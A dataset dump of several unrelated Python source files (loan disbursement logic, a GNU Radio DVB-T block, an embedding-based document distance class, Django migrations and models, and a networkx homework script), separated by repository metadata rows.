oAccount.DateCreated = rec.SIDate oAccount.Description = 'Rekening Cicilan' oAccount.OpenDate = rec.ProposeDate oAccount.TerminalCreated = TerminalUser oAccount.UserCreated = UserLogin oAccount.CyclePeriodCount = 0 oAccount.RealPeriodCount = 0 oAccount.CollectibiltiyLevel = 1 oAccount.InstallmentBalance = 0 oAccount.DebtArrears = 0 oAccount.BranchCode = Cabang oAccount.InstallmentAmount = rec.Installment oAccount.PeriodCount = rec.PaybackPeriod oAccount.PeriodUnit = 'M' Rek = helper.GetObject('ProductAccount',Prog.accountno) if Rek.RealBalance < rec.ProposePlafond : raise '','Plafond program tidak cukup untuk plafond pengajuan' Rek.Balance -= rec.ProposePlafond Rek.RealBalance -= rec.ProposePlafond trans = helper.CreatePObject('Transaction', param2) trans.InputDate = int(config.Now()) trans.TransactionDate = rec.ProposeDate trans.Description = 'Dropping ke rekening '+recParam.CustomerName trans.IsAuthorized = 'T' trans.Inputer = UserLogin trans.BranchCode = Cabang PTItem = helper.CreatePObject('ProductTransactionItem') PTItem.TransactionId = trans.TransactionId PTItem.MutationType = 'C' PTItem.Amount = rec.ProposePlafond PTItem.Rate = 1.0 PTItem.EkuivalenAmount = rec.ProposePlafond*1.0 PTItem.CurrencyCode = '001' PTItem.Description = 'Dropping ke rekening '+recParam.CustomerName PTItem.AccountNo = Prog.accountno PTItem.BranchCode = Cabang # Droping ke rekening peserta ftItem = helper.CreatePObject('FinancingTransactionItem') ftItem.TransactionId = trans.TransactionId ftItem.MutationType = 'D' ftItem.Amount = rec.ProposePlafond ftItem.Rate = 1.0 ftItem.EkuivalenAmount = rec.ProposePlafond*1.0 ftItem.CurrencyCode = '001' ftItem.Description = 'Dropping dari rekening program '+Prog.productname ftItem.AccountNo = oAccount.AccountNo ftItem.BranchCode = Cabang if recParam.DepositBalance > 0 : # Angsuran Dari Deposit ftItem2 = helper.CreatePObject('FinancingTransactionItem') ftItem2.TransactionId = trans.TransactionId ftItem2.MutationType = 'C' ftItem2.Amount = recParam.DepositBalance ftItem2.Rate = 1.0 ftItem2.EkuivalenAmount = recParam.DepositBalance*1.0 ftItem2.CurrencyCode = '001' ftItem2.Description = 'Potongan dari saldo deposit ' ftItem2.AccountNo = oAccount.AccountNo ftItem2.BranchCode = Cabang oAccount.BaseBalance -= recParam.DepositBalance oAccount.InstallmentBalance += recParam.DepositBalance oAccount.CyclePeriodCount += 1 simpanAQH = helper.GetObject('MustahiqAQH', (rec.MustahiqId)) simpanAQH.DepositBalance = 0 PTItem2 = helper.CreatePObject('ProductTransactionItem') PTItem2.TransactionId = trans.TransactionId PTItem2.MutationType = 'D' PTItem2.Amount = recParam.DepositBalance PTItem2.Rate = 1.0 PTItem2.EkuivalenAmount = recParam.DepositBalance*1.0 PTItem2.CurrencyCode = '001' PTItem2.Description = 'Potongan dari saldo deposit peserta '+recParam.CustomerName PTItem2.AccountNo = Prog.accountno PTItem2.BranchCode = Cabang Rek.Balance += recParam.DepositBalance Rek.RealBalance += rec.ProposePlafond config.Commit() except: config.Rollback() status.IsErr = 1 status.ErrMessage = str(sys.exc_info()[1])
UTF-8
Python
false
false
2,013
8,254,927,156,980
1f57372d5ac33e7b8a2d15146571e483e28aab90
f557a70a97de5053a8b3e5a85bd48f0e54917911
/sourcecode/fileIO.py
9eb946bf862d4a1d7c8316a7efb06c813301fd3b
[]
no_license
Software-statistics/Statistics
https://github.com/Software-statistics/Statistics
0368fd9d0a1f2c33085e6ad00c47ba935e97d5ee
578692a2af8b054e3a4d24cebc72732909da93df
refs/heads/master
2021-01-19T05:36:00.672812
2014-06-08T07:44:17
2014-06-08T07:44:23
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#-*- coding:UTF-8 -*- def fwrite(path, message): f = open(path,"w") f.write(message) f.close def fread(path): f = open(path,"r") for line in f: print line f.close
UTF-8
Python
false
false
2,014
4,990,752,034,389
c7c22266035707ed7753a89ab177229053487fba
8bf66340269b0be1e94f47a1d3cf038cb2d80f55
/gr-dvbt/python/dvbt_source.py
070207526d41dd3ae0d8c13c68a35fc025fbf24f
[ "GPL-3.0-or-later", "GPL-1.0-or-later", "GPL-3.0-only" ]
non_permissive
katsikas/gnuradio
https://github.com/katsikas/gnuradio
423887d68b55a7ffe993e280e2f861f381c64718
e7970cd27568ba86547aa2598372bef1643dc8ea
refs/heads/master
2016-09-16T01:25:07.695512
2012-10-05T06:40:58
2012-10-05T06:40:58
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # # Copyright 2012 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # import sys import random import dvbt_swig from gnuradio import gr from dvbt_utils import * class dvbt_source(gr.hier_block2): """ Create an MPEG Transport stream source for DVBT.An MPEG TS consists of 4 header bytes and 184 data bytes. The rest 68 bytes in order to have a total of 256 byte packet are set to zero.(Padding) """ def __init__(self,file): """ Pad tranport stream packets to 256 bytes,add header bytes and reformat appropriately. @param ts: MPEG transport stream. @type ts: MPEG TS sequence of bytes; len(ts) % 188 == 0 """ ######################################################### # Python code for creating MPEG TS source and padding. #ts = create_transport_stream_packet(packets_number,file) #src = gr.file_source(gr.sizeof_char*1, file, False) #pad = pad_stream(ts, 256, 68) #src = gr.vector_source_b(ts,False,1) ######################################################### src = gr.file_source(gr.sizeof_char*1, file, False) pad = dvbt_swig.pad() #randomizer = dvbt_swig.randomizer() gr.hier_block2.__init__(self, "dvbt_source", gr.io_signature(0, 0, 0), pad.output_signature()) self.connect(src, pad, self)
UTF-8
Python
false
false
2,012
19,593,640,820,479
b51ebfa7b68364f25cf1f4aefa3e9e3e5032557b
78dafe2d231c18ff59afc4015c92bd62130627e0
/code/PAD.py
1c401d18e44deaed90b29d716d1d61282bf77c4c
[]
no_license
nmonath/NLPProject
https://github.com/nmonath/NLPProject
c8c7932073176034b10de6a6987b01c86daea498
b32a696066a59f0a4e66d1d9f72c8152ad07dd06
refs/heads/master
2021-01-21T23:38:50.553645
2014-05-21T17:51:35
2014-05-21T17:51:35
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from sklearn.neighbors import KDTree from sklearn.preprocessing import normalize from sklearn.metrics import euclidean_distances import Word2VecExecuter import numpy as np from Features import Word import Features import copy class Document: def __init__(self, pred_arg_structures=None, embeddings=None, doc_file_name=None, word_index=None, model=None, use_lemma=True): Features.USE_LEMMA = use_lemma Features.REMOVE_FEATURES_ONLY_APPEARING_ONE_TIME = False Features.REMOVE_FEATURES_APPEARING_IN_ONLY_ONE_DOCUMENT = False Features.FREP = Features.FeatureRepresentation.STRING self.pred_arg_structures = pred_arg_structures self.use_lemma = use_lemma if (embeddings== None and doc_file_name==None and (not word_index == None) and (not model == None)): (word_index, embeddings) = Word2VecExecuter.Word2VecLoadWordsHashTable(model, word_index) embeddings = np.array(embeddings) elif (not doc_file_name == None) and (not model == None): Features.USE_LEMMA = use_lemma words = Features.ReadDependencyParseFile(doc_file_name, funit=Features.FeatureUnits.WORD, remove=False) (word_index, embeddings) = Word2VecExecuter.Word2VecLoadWordsHashTable(model, words) embeddings = np.array(embeddings) self.pred_arg_structures = Features.ReadDependencyParseFile(doc_file_name, funit=Features.FeatureUnits.PREDICATE_ARGUMENT, remove=False) del words self.embeddings = normalize(np.array(embeddings)) self.word_index = word_index def word_string(self, word): if self.use_lemma: return word.lemma else: return word.form def distance(self, other, theta=0.5): dist_self_to_other = 0 dist_other_to_self = 0 for pa1 in self.pred_arg_structures: mindist = np.Inf for pa2 in other.pred_arg_structures: curr_dist = self.dist_btw_two_pas(other, pa1, pa2) if curr_dist < mindist: mindist = curr_dist dist_self_to_other += mindist dist_self_to_other = dist_self_to_other / len(self.pred_arg_structures) for pa2 in other.pred_arg_structures: mindist = np.Inf for pa1 in self.pred_arg_structures: curr_dist = other.dist_btw_two_pas(self, pa2, pa1) if curr_dist < mindist: mindist = curr_dist dist_other_to_self += mindist dist_other_to_self = dist_other_to_self / len(other.pred_arg_structures) return dist_self_to_other*theta + dist_other_to_self*(1-theta) def dist_btw_two_pas(self, other, pa1, pa2): dist = 0 try: dist += euclidean_distances(self.embeddings[self.word_index[str(pa1.pred)], :], other.embeddings[other.word_index[str(pa2.pred)], :]) except: dist += 2 null_args = 0 for arg in pa1.args: if not arg in pa2.args: dist += 2 else: emb1 = None emb2 = None for w in pa1.args[arg]: if emb1 == None: try: emb1 = self.embeddings[self.word_index[str(w)], :] except: None else: try: emb1 = emb1 + self.embeddings[self.word_index[str(w)], :] except: None for w in pa2.args[arg]: if emb1 == None: try: emb1 = other.embeddings[other.word_index[str(w)], :] except: None else: try: emb1 = emb1 + other.embeddings[other.word_index[str(w)], :] except: None if not emb1 == None: if not emb2 == None: dist += euclidean_distances(emb1, emb2) else: dist += 2 else: null_args += 1 dist = dist / (len(pa1.args) + 1 - null_args) return dist def padist(self, pa_in_self, other, return_pa=False, penalty=2): mindist = 0; minpa = "" for pa_other in other.pred_arg_structures: dist = 0; terms_compared = 0; try: dist = dist + euclidean_distances(self.embeddings[self.word_index[self.word_string(pa_in_self.pred)]], other.embeddings[other.word_index[other.word_string(pa_other.pred)]]) terms_compared = terms_compared + 1 except: dist = dist + penalty terms_compared = terms_compared + 1 for arg_label_self in pa_in_self.args: emb_arg_self = None try: for w in pa_in_self.args[arg_label_self]: if emb_arg_self: try: emb_arg_self = emb_arg_self + self.embeddings[self.word_index[self.word_string(w)]] except: None else: try: emb_arg_self = self.embeddings[self.word_index[self.word_string(w)]] except: None except: None if not (emb_arg_self == None): terms_compared = terms_compared + 1 if arg_label_self in pa_other.args: emb_arg_other = None try: for w in pa_other.args[arg_label_self]: if emb_arg_other: try: emb_arg_other = emb_arg_other + other.embeddings[other.word_index[other.word_string(w)]] except: None else: try: emb_arg_other = other.embeddings[other.word_index[other.word_string(w)]] except: None dist = dist + euclidean_distances(emb_arg_self, emb_arg_other) except: dist = dist + penalty terms_compared = terms_compared + 1 else: dist = dist + penalty terms_compared = terms_compared + 1 if terms_compared > 0: dist = dist/terms_compared else: dist = 2 if dist < mindist: mindist = dist minpa = copy.deepcopy(pa_other) if return_pa: return (mindist, minpa) else: return mindist
UTF-8
Python
false
false
2,014
13,091,060,341,669
d4d145a494c14d16a52d58393ffeefc2784f9a32
b82ec8b87fe1bf6eeb38e1bafeacb83bb4e8bebd
/main/migrations/0001_initial.py
12b5a86c19371cce3c3377c61889b28e68d6b9cb
[]
no_license
rowama/tadlog
https://github.com/rowama/tadlog
6008eec63a9240c9306369ad4ba003398026bf17
e053b8cfcb3bf7df2871bd8d2b7cff1a02ccad32
refs/heads/master
2021-01-21T22:29:19.106784
2013-10-27T21:30:24
2013-10-27T21:30:24
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Tad' db.create_table(u'main_tad', ( (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('created_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)), ('modified_time', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)), ('logged_time', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)), ('note', self.gf('django.db.models.fields.TextField')()), )) db.send_create_signal(u'main', ['Tad']) # Adding M2M table for field tags on 'Tad' m2m_table_name = db.shorten_name(u'main_tad_tags') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('tad', models.ForeignKey(orm[u'main.tad'], null=False)), ('tag', models.ForeignKey(orm[u'main.tag'], null=False)) )) db.create_unique(m2m_table_name, ['tad_id', 'tag_id']) # Adding model 'Tag' db.create_table(u'main_tag', ( (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('name', self.gf('django.db.models.fields.CharField')(max_length=50)), )) db.send_create_signal(u'main', ['Tag']) def backwards(self, orm): # Deleting model 'Tad' db.delete_table(u'main_tad') # Removing M2M table for field tags on 'Tad' db.delete_table(db.shorten_name(u'main_tad_tags')) # Deleting model 'Tag' db.delete_table(u'main_tag') models = { u'main.tad': { 'Meta': {'object_name': 'Tad'}, 'created_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'logged_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'modified_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'note': ('django.db.models.fields.TextField', [], {}), 'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['main.Tag']", 'symmetrical': 'False'}) }, u'main.tag': { 'Meta': {'object_name': 'Tag'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } complete_apps = ['main']
UTF-8
Python
false
false
2,013
18,210,661,337,157
be10ea3266650f3d1902d100f4bac7d143023dc0
fe9cf2b0bb60cf0817699704ed59d8e7c0f81e91
/src/ska/contrib/django/ska/urls.py
625e9305a3fb055c8f51b3db7c86536a0dab5052
[ "LGPL-2.1-only", "LGPL-2.1-or-later", "GPL-1.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "GPL-2.0-or-later", "GPL-2.0-only" ]
non_permissive
luzfcb/ska
https://github.com/luzfcb/ska
63cae8db239faed47912f7099921b7a8508a0ca4
102fa32cab4fa5799b8655b17c3da2bd3f14562c
refs/heads/master
2021-01-15T20:22:52.418879
2014-06-07T21:52:17
2014-06-07T21:52:17
42,519,296
1
0
null
true
2015-09-15T12:56:31
2015-09-15T12:56:30
2015-09-15T12:55:32
2014-06-07T21:52:22
984
0
0
0
null
null
null
__title__ = 'ska.contrib.django.ska.urls' __author__ = 'Artur Barseghyan' __copyright__ = 'Copyright (c) 2013 Artur Barseghyan' __license__ = 'GPL 2.0/LGPL 2.1' __all__ = ('urlpatterns',) from django.conf.urls import patterns, url from ska.contrib.django.ska.views import login urlpatterns = patterns('', url(r'^login/', login, name="ska.login"), )
UTF-8
Python
false
false
2,014
1,529,008,361,439
698a130aa2ac15da128a9a277617f3af9e513ca9
5edf7cd9dc43c76c07ce047c86ed4dc00159b77e
/fp/client.py
16a7c1d6ddffc19911a293bc68d5d3079a5a04f9
[]
no_license
5109100090/progjar
https://github.com/5109100090/progjar
077b74120221d23f39c070fbd432a8a4ceb7d683
f47424a88dabb687b6c8085e430a00b1561964c8
refs/heads/master
2023-05-12T23:01:34.763108
2013-01-01T11:31:53
2013-01-01T11:31:53
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import socket, random, threading, time class game(threading.Thread): def __init__(self,s): threading.Thread.__init__(self) self.s = s self.stoptrigger = threading.Event() def stop(self): self.stoptrigger.set() def run(self): while not self.stoptrigger.isSet(): running = 1 while running : #print 'waiting response from server ...' msg = self.s.recv(1024) rd = msg.split('###') if rd[0] == 'BROADCAST': print rd[1] elif rd[0] == 'PLAY' : print rd[1] msg = raw_input() if msg == 'r' : msg = str(random.randint(1,6)) self.s.send(msg) #if msg == 'exit': # self.stop() class recv(threading.Thread): def __init__(self,s,sen): threading.Thread.__init__(self) self.s = s self.sen = sen self.stoptrigger = threading.Event() def stop(self): self.stoptrigger.set() def run(self): while not self.stoptrigger.isSet(): msg = self.s.recv(1024) rd = msg.split('###') #if rd[0] == 'start' : # print rd[1] # self.stop() # self.sen.stop() # g = game(self.s) # g.start() # break if rd[0] == 'FINISH': print rd[1] self.s.close() #close socket self.sen.stop() #stop send thread self.stop() #stop this thread break if msg == 'exit': print 'bye.' self.sen.stop() self.stop() elif len(rd) == 1: print msg elif len(rd) == 2: print rd[1] class send(threading.Thread): def __init__(self,s): threading.Thread.__init__(self) self.s = s self.stoptrigger = threading.Event() def stop(self): self.stoptrigger.set() def run(self): while not self.stoptrigger.isSet(): msg = raw_input() if msg == 'r' : msg = str(random.randint(1,6)) print 'dice : ' + msg elif msg == 'exit': self.stop() else: m = 0 self.s.send(msg) if __name__ == "__main__": IP = '10.151.36.39' PORT = 6000 ADDR = (IP,PORT) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(ADDR) sen = send(s) sen.start() rec = recv(s, sen) rec.start()
UTF-8
Python
false
false
2,013
11,304,353,930,063
0a66ac89421dca6a956e95786d4029a48cdc0b82
2967c0d3c7ec878f436da69e919d57b18cb83de4
/CS 224W/corn/hwk2.py
ab36bcb9172aca1ca25e13c577e1673367d6d6c8
[]
no_license
ryanefoley/repo3
https://github.com/ryanefoley/repo3
e14d5096c45d827dca9130f81b93b945011c8383
afa9fe038f655e2f6b40040ff4b16ff786b2bc85
refs/heads/master
2016-08-08T15:22:00.735742
2013-01-06T23:52:30
2013-01-06T23:52:30
7,474,291
3
13
null
null
null
null
null
null
null
null
null
null
null
null
null
import matplotlib.pyplot as plt import matplotlib import networkx as nx from random import * import excess_degree as ed #Problem 1a n = 5242 m = 14496 #Gnm Graph print "Creating Gnm Graph..." gnm = nx.gnm_random_graph(n, m) #Small world graph def small_world(): print "Creating small world..." sw = nx.Graph() #create ring for i in range(n): if(i == n-1): sw.add_edge(i, 0) sw.add_edge(i, 1) else: if(i == n-2): sw.add_edge(i, i+1) sw.add_edge(i, 0) else: sw.add_edge(i, i+2) sw.add_edge(i, i+1) iters = 4012 iter = 0 while(iter < iters): n1 = randint(0, n-1) n2 = randint(0, n-1) if(n1 != n2 and (n1,n2) not in sw.edges() and (n2,n1) not in sw.edges()): sw.add_edge(n1,n2) iter += 1 return sw sw = small_world() #Real-World Collaboration Network print "Reading Real-World graph..." rw = nx.read_adjlist("ca-GrQc.txt", create_using=nx.DiGraph()) print "Plotting..." degree_sequence=sorted(nx.degree(gnm).values(),reverse=True) # degree sequenc p1, = plt.loglog(degree_sequence,'b-',marker='o') degree_sequence=sorted(nx.degree(sw).values(),reverse=True) # degree sequenc p2, = plt.loglog(degree_sequence,'r-',marker='o') degree_sequence=sorted(nx.degree(rw).values(),reverse=True) # degree sequenc p3, = plt.loglog(degree_sequence,'y-',marker='o') plt.title("Degree rank plot") plt.ylabel("degree") plt.xlabel("rank") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("degree_histogram.png") plt.close() #from collections import Counter degree_sequence1=sorted(nx.degree(gnm).values(),reverse=True) degree_sequence2=sorted(nx.degree(sw).values(),reverse=True) degree_sequence3=sorted(nx.degree(rw).values(),reverse=True) counts1 = Counter(degree_sequence1) counts2 = Counter(degree_sequence2) counts3 = Counter(degree_sequence3) p1, = plt.loglog(counts1.items(),'b-',marker='o') p2, = plt.loglog(counts2.items(),'r-',marker='o') p3, = plt.loglog(counts3.items(),'y-',marker='o') plt.title("Degree rank plot") plt.ylabel("degree") plt.xlabel("rank") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("degree_histogram.png") plt.close() counts1 = {} counts2 = {} counts3 = {} for i in range(len(degree_sequence1)): if(i in counts1): counts1[i] += 1 else: counts1[i] = 1 for i in range(len(degree_sequence1)): if(i in counts1): counts1[i] += 1 else: counts1[i] = 1 for i in range(len(degree_sequence1)): if(i in counts1): counts1[i] += 1 else: counts1[i] = 1 p1, = plt.loglog(counts1,'b-',marker='o') p2, = plt.loglog(counts2,'r-',marker='o') p3, = plt.loglog(counts3,'y-',marker='o') plt.title("Degree rank plot") plt.ylabel("degree") plt.xlabel("rank") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("test3.png") plt.close() #1b - getting excess degree histograms q = ed.excess_degree(gnm) p1, = plt.loglog(q,'b-',marker='o') q = ed.excess_degree(sw) p2, = plt.loglog(q,'r-',marker='o') q = ed.excess_degree(rw) p3, = plt.loglog(q,'y-',marker='o') plt.title("Excess Degree Distribution") plt.ylabel("excess degree") plt.xlabel("k") plt.legend([p1, p2, p3], ["Gnm", "Small-World", "Real-World"]) plt.savefig("excess_degree_histogram.png") plt.close()
UTF-8
Python
false
false
2,013
15,315,853,419,983
0246768c24dba5cf4662ac9d69716f760618f6fa
cda2adff398d4165e431194df3bc8a0ba2facce0
/newecosystems/apps/core/adminurls.py
3f2660d7faf3eb7ff019a67996715190df86b1a4
[ "MIT" ]
permissive
dparizek/newecosystems
https://github.com/dparizek/newecosystems
09ebae05e9c0326536321e3814cbdede686b35ae
6dfe8e8b5706ea6ccbe18a5f473d2d66b9f3a233
refs/heads/master
2020-12-25T19:14:50.446304
2014-06-26T05:47:02
2014-06-26T05:47:02
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.conf.urls import * urlpatterns = patterns('', url(r'^$', 'apps.core.adminviews.plantAdminIndex'), url(r'generate-static-files/$', 'apps.core.adminviews.generateStaticFiles'), url(r'fetch-from-firefly/$', 'apps.core.adminviews.fetchFromFirefly'), url(r'process-firefly-data/$', 'apps.core.adminviews.processFireflyData'), url(r'parse-out-firefly/$', 'apps.core.adminviews.parseOutFirefly'), url(r'redo-slugs/$', 'apps.core.adminviews.redoSlugs'), )
UTF-8
Python
false
false
2,014
12,000,138,638,334
e81489ed8f8062dc8d8350a2b8bac0c372dc204f
bc49e3d8f85c1839ec3afeb14eb056b50cfef9d7
/src-1.0.10-beta/nanocap/core/points.py
fca76cd7944c4b7ccac6fb17baffc1cd9de8abf9
[ "LicenseRef-scancode-proprietary-license", "CC-BY-NC-2.5" ]
non_permissive
CurtinIC/nanocap
https://github.com/CurtinIC/nanocap
968b1ce98356a0ceb9c0432c0b8c8e353cf3d572
d90949d77ee2ae28a87c8bcf853a0488bab7619f
refs/heads/master
2021-01-25T06:44:48.927742
2014-05-29T06:20:33
2014-05-29T06:20:33
93,600,398
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
''' -=-=-=-=-=-=-= NanoCap -=-=-=-=-=-=-= Created: Aug 24 2011 Copyright Marc Robinson 2013 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Points class for holding positions, freeflags etc Functions to get bounds, centers, NNdists etc. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ''' from nanocap.core.globals import * from nanocap.core.util import * import os,sys,math,copy,random,time import numpy class Points(object): def __init__(self,PointSetLabel): self.PointSetLabel = PointSetLabel self.final_energy = 0 self.final_scale_energy = 0 self.final_scale = 0 def setLabel(self,lab): self.PointSetLabel = lab def getCenter(self): b = self.getBounds() return numpy.array([(b[0]+b[3])*0.5,(b[1]+b[4])*0.5,(b[2]+b[5])*0.5]) def getBounds(self): if(self.npoints==0): return 0,0,0,0,0,0 x,y,z = self.pos[0::3],self.pos[1::3],self.pos[2::3] return numpy.min(x),numpy.min(y),numpy.min(z),numpy.max(x),numpy.max(y),numpy.max(z) def getNNdist(self,ncheck=1): avr2 = [] for i in range(0,ncheck): xd = self.pos[i] - self.pos[0::3] yd = self.pos[i] - self.pos[1::3] zd = self.pos[i] - self.pos[2::3] r2 = xd*xd + yd*yd + zd*zd r2 = numpy.delete(r2,i) avr2.append(numpy.min(r2)) return math.sqrt(numpy.average(avr2)) def initArrays(self,npoints,free=True,damp=False): self.npoints = npoints self.pos = numpy.zeros(npoints*3,NPF) self.pos0 = numpy.zeros(npoints*3,NPF) if(free): self.freeflagspos = numpy.ones(npoints*3,NPF) self.freeflags = numpy.ones(npoints,NPF) else: self.freeflagspos = numpy.zeros(npoints*3,NPF) self.freeflags = numpy.zeros(npoints,NPF) if(damp): self.dampflagspos = numpy.ones(npoints*3,NPF) self.dampflags = numpy.ones(npoints,NPF) else: self.dampflagspos = numpy.zeros(npoints*3,NPF) self.dampflags = numpy.zeros(npoints,NPF) def reset(self,npoints): self.npoints = npoints self.pos = numpy.zeros(npoints*3,NPF) def removeIndexes(self,indexes): self.npoints -= len(indexes) posindexes = numpy.concatenate((indexes*3,indexes*3+1,indexes*3+2)) self.pos = numpy.delete(self.pos,posindexes) try:self.freeflagspos = numpy.delete(self.freeflagspos,posindexes) except:pass try:self.freeflags = numpy.delete(self.freeflags,indexes) except:pass def getPoint(self,index): return numpy.array([self.pos[index*3],self.pos[index*3+1],self.pos[index*3+2]]) def __str__(self): return "PointSet: "+str(self.PointSetLabel) def joinPointSets(sets): out = Points("") np = 0 pos = [] pos0 = [] freeflags = [] freeflagspos = [] dampflags = [] dampflagspos = [] for set in sets: np += set.npoints pos0.append(set.pos0) pos.append(set.pos) freeflagspos.append(set.freeflagspos) freeflags.append(set.freeflags) #dampflagspos.append(set.dampflagspos) #dampflags.append(set.dampflags) out.initArrays(np) out.pos = numpy.concatenate(pos) out.pos0 = numpy.concatenate(pos0) out.freeflagspos = numpy.concatenate(freeflagspos) out.freeflags = numpy.concatenate(freeflags) #out.dampflagspos = numpy.concatenate(dampflagspos) #out.dampflags = numpy.concatenate(dampflags) return out
UTF-8
Python
false
false
2,014
12,610,023,994,664
260d129172574db3884dc539d553e04d25ed86df
9f7112ef15c1f05c71faa031d1bfc6d30c811d7e
/python/pieces/histogram.py
5e8a392b4e6460fd1bf22947979c6008dc8c4907
[]
no_license
VijayEluri/codes
https://github.com/VijayEluri/codes
62dce4a771cd73973bef318c132e1b8d08ee33d5
1fe24121bbeb98b3c0b6bf719219152b16b34159
refs/heads/master
2020-05-20T11:13:26.525288
2013-05-14T02:14:48
2013-05-14T02:14:48
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#~ -*-coding:utf-8-*- def histogram(dizge): str = dizge.lower() nharf = {} for harf in str: if harf.isalpha(): nharf[harf] = nharf.get(harf, 0) + 1 a = nharf.keys() b = nharf.values() for i in range(len(a)): print a[i], ":", b[i] #histogram("sefa ali veli selami kara goz kara kas besiktas samsunspor")
UTF-8
Python
false
false
2,013
18,880,676,266,410
9c4e57b700dd0273fa8820f74b468f012629bd43
0165c8079b08e465c46789526d157ab0ac8ae188
/iki/contrib/photo/models.py
25fabbc4dcb38ed37a845aed56ef441bd5f065d1
[]
no_license
callard/iki
https://github.com/callard/iki
372dce384ff88b5b28c206e36e02dbb90f0a84e8
c5402725fb00b81f58e12609255b29a801e457c0
refs/heads/master
2021-01-01T16:24:57.488972
2007-11-06T23:49:41
2007-11-06T23:49:41
32,188,421
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- encoding: utf-8 -*- """Photo contrib application : models """ import datetime import random from django.db import models from django.contrib.auth.models import User # i18n from django.utils.translation import gettext_lazy as _ # magic iki stuff ;) from iki.core.media import Media class Album(models.Model): name = models.CharField(_("name"), maxlength=25, db_index=True, help_text=_('Name of your album')) slug = models.SlugField(_("slug"), prepopulate_from=['name'], help_text=_('Automatically built from the name'),) desc = models.TextField(_("description"), db_index=True, help_text=_('Description'), blank=True) owner = models.ForeignKey(User, verbose_name=_("Owner")) class Meta: unique_together=(('name', 'owner'),) class Admin: list_display = ('name', 'owner',) list_filter = ('owner',) search_fields = ('name', 'desc',) ordering = ('name',) def __unicode__(self): return u"%s" % self.name def __str__(self): return "%s" % self.name def save(self): super(Album, self).save() def get_absolute_url(self): raise NotImplementedError class Photo(Media): """Photo model for iki You just have to define here the non-common field (the others are define elsewhere, in Media) >>> p1 = Photo() """ album = models.ForeignKey(Album, verbose_name=_("Album"), null=True, blank=True)
UTF-8
Python
false
false
2,007
12,309,376,271,949
dd8983317818331e9894432276b2a75a41d56580
c64731600c594ac34a1df04924f13a715d651fef
/parser.py
833d2e48b200f04cc4966ae377405799ae86f984
[]
no_license
willdrevno/unitconverter
https://github.com/willdrevno/unitconverter
8adb7f6b9842bbad000df0fc587cd81c978a9a5f
bbac9dc7bfe4e3b25a981525a7d42282d1bf7853
refs/heads/master
2016-09-06T19:25:38.393121
2013-05-07T06:39:35
2013-05-07T06:39:35
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" The parser takes in a string formatted as follows: AMOUNT SOURCE_UNIT in DESTINATION_UNIT and outputs the relavent components as an array """ def parser(string): sepstring = string.split(' ') #breaks the string into parts of an array wherever there is a space return sepstring
UTF-8
Python
false
false
2,013
15,891,378,997,537
08a1cecc915da27de894233560efef1bd31adbea
3cde22e51e7fd01c0aec274ea29034bee8f3adbe
/Related Recommend Interface Test/src/R-3/Parse/allpair1s.py
6ad0b0acde15158ac39d4b6854e9fa3c18db2247
[]
no_license
ynztyl10/RelatedCommand-youku
https://github.com/ynztyl10/RelatedCommand-youku
87deae326b988d107132de831ea9208e61add236
1c5738b52b3044a15d2a975ea5a4610b8842cb62
refs/heads/master
2015-07-23T06:13:14
2012-08-15T02:25:36
2012-08-15T02:25:36
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
